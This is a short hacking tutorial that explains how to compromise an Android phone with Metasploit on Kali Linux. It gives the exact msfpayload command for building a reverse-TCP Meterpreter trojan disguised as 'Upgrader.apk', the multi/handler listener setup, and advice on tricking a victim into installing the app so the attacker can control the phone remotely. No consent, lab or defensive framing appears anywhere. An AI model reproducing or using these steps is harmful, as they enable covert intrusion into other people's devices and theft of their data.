In this tutorial you'll learn how to hack an Android device using Metasploit running on Kali Linux. Let's hack some!
We'll be creating a little APK file and pushing it over to the victim. When victim installs & eventually opens the file, we'll be able to control his/her device using Zetasploit commands. Easy, peasy!
This is an advanced tutorial, advanced skillz needed!
Step 1 - Launch Kali and make an APK of the trojan virus you'll be sending over to a victim.
You can do so by typing the following command:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk
- Replace LHOST with your own IP adresss.
- This is meant for LAN pushing, if you're about to hack through WAN (through the net), you'll hav eto use external IP with port forwarding.
Step 2 - Open up another console and load Metasploit console, type msfconsole
Step 3 - After the Metasploit console loads, load the multi-handler by typing use exploit/multi/handler command.
Step 4 - Set up payload by typing set payload android/meterpreter/reverse_tcp to the console.
To set up the host, type: set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 5 - Exploit. Type exploit to start listener. Copy the upgrader.apk and upload it somewhere. Be creative and let the victim install your virus app on their phone. (The victim must have "unknown sources" checked in case to install apps not from Google Play).
After the victim opens up your app, you can use Meterpreter commands to control the victim's phone. Easy, cheezy.
See Meterpreter commands here:
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics
Source
How To Remotely Hack Android using Kali Linux
